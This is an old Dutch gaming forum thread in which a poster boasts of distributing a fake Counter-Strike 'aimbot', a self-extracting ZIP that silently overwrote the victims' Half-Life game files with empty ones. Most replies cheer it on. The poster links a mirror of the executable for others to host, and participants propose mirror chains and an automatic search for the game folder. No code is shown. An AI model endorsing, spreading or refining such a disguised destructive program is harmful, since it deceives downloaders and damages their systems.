[BC3] Ultieme CS cheater payback!

Pagina: 1
Acties:

• BC3 Victim
  • Registratie: Juli 2001
  • Laatst online: 29-09-2006
paar weekies geleden een site NBCI gemaakt die te gaar was voor woorden (heel veel spelfouten + tig keer het woord l33t! :)). Met MMbuilder een proggie gebouwd dat een self-extracting ZIP triggerde (overwrite without prompt/confirm aan >:))
in die zip zaten allemaal 0kb files die gelijk vernoemd zijn naar alle maps/configs/.wad files ... MAW hij overschreef half de halflife + mods dir met rotzooi >:) >:) ... hehe.. ultimate aimbot!! hopla aanmelden bij een toplijst...
site heeft et 2 dagen volgehouden :)

eindscore? 360 downloads... en een hoop flames in de mailbox.. :)

misschien niet netjes.. maar met recht een counter-strike >:)

De username van de oorspronkelijke plaatser van deze posting is bij Big Crash 3 eind mei 2001 verloren gegaan. Om toch de posting zelf terug te kunnen plaatsen is de user BC3 Victim in het leven geroepen

• Lister_Storm
  • Registratie: Februari 2001
  • Laatst online: 24-01-2022
hulde

misschien domme vraag, maar waarom werd site uit de lucht gehaald?

Heusinkveld Engineering

Verwijderd

LOL dit vind ik wel een goeie ja :) kunnen we geen keten op zetten onde de gamers hier ?
als je iedereen de index.htm file ofzo stuurt dat we steeds een mirror hebben om die lame asses te pakken >:)

• JeroenNietDoen
  • Registratie: Januari 2001
  • Laatst online: 16:30
ik volg het effe niet...
een zip die files van cheaters overschrijft??

• Bokkie
  • Registratie: April 2000
  • Niet online

Bokkie

What the hell are you?

moet je wel weten in welke directory HL staat
want bij mij staat ie en niet standaard en staat de dir niet in het register (bij updates moet ik ook atllijd zelf de dir aangeven)

| Respect to the man in the icecream van! |
| i'm not completely useless, I can be used as a bad example! |

• BC3 Victim
Op dinsdag 24 april 2001 05:37 schreef Lister_Storm het volgende:
hulde

misschien domme vraag, maar waarom werd site uit de lucht gehaald?
WAREZ404Error .... haha.. en dat na drie dagen... zullen wel wat klachten gekregen hebben ben ik bang :)
LOL dit vind ik wel een goeie ja kunnen we geen keten op zetten onde de gamers hier ?
als je iedereen de index.htm file ofzo stuurt dat we steeds een mirror hebben om die lame asses te pakken
Ik heb het proggie (let op hijs zeer triest :)) ge-mirrored..... voor mensen die zelf een mirror willen opzetten of om ff te lachen... BTW niet op install klikken als je HL in de default dir staat.. hehe >:)
www.spray.f2s.com/cbin/countdown.cgi?UAimbot.exe
ik volg het effe niet...
een zip die files van cheaters overschrijft??
euh.. nee eigelijk gewoon een zooi maps/configs, zodat HL onspeelbaar word en je opnieuw mag installen/patchen >:)

De username van de oorspronkelijke plaatser van deze posting is bij Big Crash 3 eind mei 2001 verloren gegaan. Om toch de posting zelf terug te kunnen plaatsen is de user BC3 Victim in het leven geroepen

Verwijderd

>:)

• Captain Pervert
  • Registratie: Mei 2000
  • Laatst online: 05-03 12:19
LOL

:Y):9>:)

Prachtig.

Porsche 928 - It's about as fast as you can go without having to eat airline food.

• collin
  • Registratie: Februari 2000
  • Laatst online: 18-12-2024

collin

Who da man !!

Kewl!! Maar dat moet slimmer kunnen >:) kan er iemand niet een zoekfunctie inbouwen? Dat ie zelf zoekt naar de goede HL dir? >:)>:)>:)>:)

TOP IDEE!! :)

Mijn iRacing profiel

• BC3 Victim
als je een autosearch in gaat voegen, heb je overal bevestiging voor nodig (dir en overschrijven van ...) een self-extracting zip heeft als goede eigenschap dat hij overschrijft zonder te melden wat hij overschrijft >:) vandaar voor deze ietwat simpele manier.. >:)

• YakuzA
  • Registratie: Maart 2001
  • Niet online

YakuzA

Wat denk je nou zelluf hey :X

Hulde >:) eindelijk een goede manier om wannabee cheaters te verneuken>:)

Death smiles at us all, all a man can do is smile back.
PSN

• BC3 Victim
ik speel geen CS, but cheaters zuigen grote tijd!! En deze maner roeleert echt wel!!!

Verwijderd

LOL :-)

Hij is echt goed!!

Verwijderd

ik speel dan wel geen online games ,maar ik kan me voorstellen hoe irritant cheaten is ...goede actie man ! TOP
Pagina: 1